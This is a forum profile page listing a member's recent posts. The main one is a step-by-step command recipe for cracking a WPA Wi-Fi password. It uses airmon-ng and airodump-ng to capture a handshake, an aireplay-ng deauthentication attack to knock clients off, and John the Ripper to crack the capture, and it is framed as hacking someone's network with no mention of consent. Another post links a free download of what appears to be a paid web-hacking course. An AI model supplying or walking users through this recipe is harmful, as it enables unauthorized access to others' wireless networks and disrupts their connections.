Cxck5

Members
  • Content Count

    9
  • Last visited

Community Reputation

0 Neutral

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
  2. 1)airmon-ng 2)airmon-ng start wlan0 3)airmon-ng check kill 4)airmon-ng 5)airodump-ng wlan0mon 6)ctrl +c (after show you network that you hack ) 7)open new terminal 8)cd Desktop 9)mkdir capture 10)airodump-ng -c (channal number) --bssid (channal) -w /root/Desktop/capture/ wlan0mon 11) open new terminal 12)cd Desktop 13)aireplay-ng -0 2 -a bssid wlan0mon After getting Handshake close all the terminal. 1) Open New terminal 2)cd Desktop 3)aircrack-ng handshake name.cap -J new name of file 4)cd johnTheRipper 5 cd run 6)hccap2john /root/Desktop/new name of file.hccap > /root/Desktop/new namr .txt 7) open new terminal .......Desktop Directory.. 9)john fle name.txt
  3. [align=left]I m provide zaid sabih web hacking tutorial free open this link and download free :fyou: [/align] https://drive.google.com/drive/folders/1kBDi80Vz-aft93ISyhf-1i_FsziRlkhB?usp=sharing